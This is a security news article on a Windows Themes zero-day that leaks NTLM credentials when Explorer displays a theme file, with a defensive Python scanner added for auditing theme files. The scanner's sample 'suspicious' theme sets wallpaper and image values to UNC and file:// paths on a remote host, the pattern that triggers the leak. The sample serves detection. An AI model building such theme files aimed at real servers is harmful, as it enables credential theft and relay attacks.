In a recent investigation, cybersecurity firm ACROS Security uncovered a critical zero-day vulnerability in Windows Themes files, posing significant security risks to users. Despite Microsoft’s recent efforts to patch vulnerabilities, this flaw highlights ongoing threats to NTLM (NT LAN Manager) credentials. Researchers found that even fully updated systems, including the latest Windows 11 24H2, remain susceptible to this exploit. The vulnerability enables attackers to obtain NTLM credentials simply by having a malicious theme file displayed in Windows Explorer. These findings underscore the persistent inadequacies of previous patches and call into question Microsoft’s ability to fully secure user credentials.
The Inadequacy of Previous Patches
Despite Microsoft’s ongoing efforts to secure its Windows operating system, recent disclosures reveal that previous patches have been insufficient in preventing NTLM credential leaks. In January, Microsoft released a patch for CVE-2024-21320 aimed at addressing this vulnerability. However, cybersecurity researchers from Akamai and ACROS Security identified that attackers can bypass the CVE-2024-21320 patch. This led to the identification of a new flaw, CVE-2024-38030, which enables attackers to use malicious theme files to obtain NTLM credentials remotely. The vulnerability causes credentials to be sent to remote servers without any user interaction, posing a severe threat to security.
The nature of this vulnerability is particularly alarming because it spans multiple versions of Windows, from Windows 7 to Windows 11 24H2. Various NTLM-based attacks can leverage this flaw, including relay and pass-the-hash techniques, which facilitate lateral movement within a network. Despite Microsoft’s efforts, these issues persist, leaving users exposed to potential compromise. The persistence of such vulnerabilities highlights a critical need for more robust and comprehensive security measures to protect NTLM credentials across all Windows platforms.
Mechanism of Exploitation
The zero-day vulnerability discovered by ACROS Security exploits a mechanism involving Windows Themes files that prompt NTLM authentication requests. When a malicious theme file is displayed in Windows Explorer, it triggers NTLM authentication requests to remote hosts. Without user intervention, these requests can send NTLM credentials to an attacker-controlled server, effectively compromising user security. To address this, ACROS Security introduced a temporary micropatch through their 0patch service, designed to block network paths within theme files and prevent unauthorized credential sharing.
Demonstrations conducted by ACROS Security highlighted the effectiveness of this micropatch. An unpatched Windows 11 24H2 system would send NTLM credentials to an attacker upon displaying a malicious theme file. A system equipped with the micropatch, however, blocked the credential leak, showing that the temporary fix mitigates this specific threat. Until Microsoft releases an official patch, users are advised to apply the micropatch provided by ACROS Security to safeguard their systems against remote NTLM credential theft.
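The micropatch described above works by refusing to follow network paths found inside theme files. The script below is an added example, not ACROS Security’s micropatch or any Microsoft code: it turns the same idea into a read-only audit that a defender can run over theme files before they are distributed or opened. It parses the INI-style `.theme` format and reports every value, in any section, that names a remote host (a UNC path, its long `\\?\UNC\` form, a forward-slash network path, or a URL with a host component). The two theme texts embedded in it are constructed for this example, and the specific section and key names they use are illustrative assumptions; the scanner itself does not depend on key names.

```python
"""Audit Windows .theme files for values that point at network locations.

Added example (not the 0patch micropatch or Microsoft code). The article
says the micropatch blocks network paths inside theme files; this script
reports such paths instead of blocking them, so a defender can review theme
files offline. The sample theme texts are constructed for this example.
"""
import codecs
import configparser
import re
import sys
from typing import List, Tuple

# Constructed sample: a theme that references only local files.
BENIGN_THEME = """\
[Theme]
DisplayName=Corporate Blue

[Control Panel\\Desktop]
Wallpaper=C:\\Windows\\Web\\Wallpaper\\Windows\\img0.jpg
"""

# Constructed sample: values that would make Windows contact a remote host
# when the theme is rendered (203.0.113.10 is a documentation-range address).
# The section/key names are assumptions for illustration only.
SUSPICIOUS_THEME = """\
[Theme]
DisplayName=Free Theme
BrandImage=\\\\203.0.113.10\\share\\logo.png

[Control Panel\\Desktop]
Wallpaper=\\\\?\\UNC\\203.0.113.10\\share\\wp.jpg

[Slideshow]
ImagesRootPath=file://203.0.113.10/share/pics
"""

# Matches any value whose target lives on a named host. Local drive paths
# (C:\...) and host-less URLs such as file:///C:/... do not match.
NETWORK_VALUE = re.compile(
    r"""^\s*(?:
        \\\\\?\\UNC\\(?P<unc_long>[^\\]+)   |   # \\?\UNC\host\share
        \\\\(?P<unc>[^\\?]+)                |   # \\host\share
        //(?P<fwd>[^/]+)                    |   # //host/share
        [a-z][a-z0-9+.\-]*://(?P<url>[^/\\]+)   # scheme://host/...
    )""",
    re.IGNORECASE | re.VERBOSE,
)

Finding = Tuple[str, str, str, str]  # (section, key, raw value, host)


def read_theme_bytes(data: bytes) -> str:
    """Decode a theme file, honouring a UTF-16 or UTF-8 BOM if present."""
    if data.startswith(codecs.BOM_UTF16_LE) or data.startswith(codecs.BOM_UTF16_BE):
        return data.decode("utf-16")  # strips the BOM
    if data.startswith(codecs.BOM_UTF8):
        return data.decode("utf-8-sig")
    return data.decode("cp1252", errors="replace")


def parse_theme(text: str) -> configparser.ConfigParser:
    """Parse the INI-style theme text without interpolation or key folding."""
    parser = configparser.ConfigParser(
        interpolation=None, strict=False, delimiters=("=",), comment_prefixes=(";", "#")
    )
    parser.optionxform = str  # keep key names as written
    parser.read_string(text)
    return parser


def find_network_references(theme_text: str) -> List[Finding]:
    """Return every (section, key, value, host) whose value targets a remote host."""
    parser = parse_theme(theme_text)
    findings: List[Finding] = []
    for section in parser.sections():
        for key, value in parser.items(section):
            match = NETWORK_VALUE.match(value)
            if match:
                host = next(group for group in match.groups() if group)
                findings.append((section, key, value, host))
    return findings


def scan_file(path: str) -> List[Finding]:
    """Read a .theme file from disk and audit it."""
    with open(path, "rb") as handle:
        return find_network_references(read_theme_bytes(handle.read()))


if __name__ == "__main__":
    # With no arguments, audit the constructed samples; otherwise audit the given files.
    targets = sys.argv[1:]
    results = ([scan_file(p) for p in targets] if targets
               else [find_network_references(BENIGN_THEME), find_network_references(SUSPICIOUS_THEME)])
    for hits in results:
        for section, key, value, host in hits:
            print(f"network reference in [{section}] {key}={value} (host {host})")
```

Run it with one or more `.theme` paths to audit real files; with no arguments it audits the two embedded samples. A hit does not prove a file is malicious (an organisation may legitimately host wallpaper on a file server), but any theme file from an untrusted source that names a host you do not control is exactly the case the article warns about.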
Staying Ahead of Potential Threats
Staying ahead of potential threats in today’s evolving cybersecurity landscape is crucial for organizations and individuals alike. SOCRadar’s Vulnerability Intelligence service serves as a vital tool in identifying, assessing, and prioritizing vulnerabilities. This service provides real-time alerts and detailed insights, allowing security teams to focus their efforts on addressing the most critical threats. By staying informed about emerging vulnerabilities and zero-day exploits, organizations can allocate resources effectively to bolster their security posture.
The rapid evolution of cyber threats necessitates proactive measures and robust vulnerability intelligence. The recent discovery of this zero-day vulnerability in Windows Themes files underscores the importance of continuously monitoring and addressing potential security gaps. Organizations are encouraged to leverage comprehensive threat intelligence solutions and ensure regular updates to stay protected against ever-changing cyber threats. Employing a proactive approach to security will help mitigate risks associated with NTLM credential leaks and other vulnerabilities, safeguarding digital environments and sensitive data.
Conclusion
In a recent investigation, cybersecurity firm ACROS Security discovered a critical zero-day vulnerability in Windows Themes files, posing significant security threats to users. Despite Microsoft’s latest efforts to patch various vulnerabilities, this flaw highlights the ongoing risks to NTLM (NT LAN Manager) credentials. Researchers showed that even fully updated systems, including the newest Windows 11 24H2, are still vulnerable to this exploit. The vulnerability allows attackers to obtain NTLM credentials merely by having a malicious theme file displayed in Windows Explorer. These findings emphasize the persistent shortcomings of previous patches and raise questions about Microsoft’s ability to fully secure user credentials. ACROS Security’s discovery is a reminder of the ever-evolving nature of cybersecurity threats and the need for continuous vigilance and improvement. Even when companies like Microsoft work diligently to fix known issues, new vulnerabilities can emerge, underscoring the importance of advanced security measures and constant monitoring to protect user data effectively.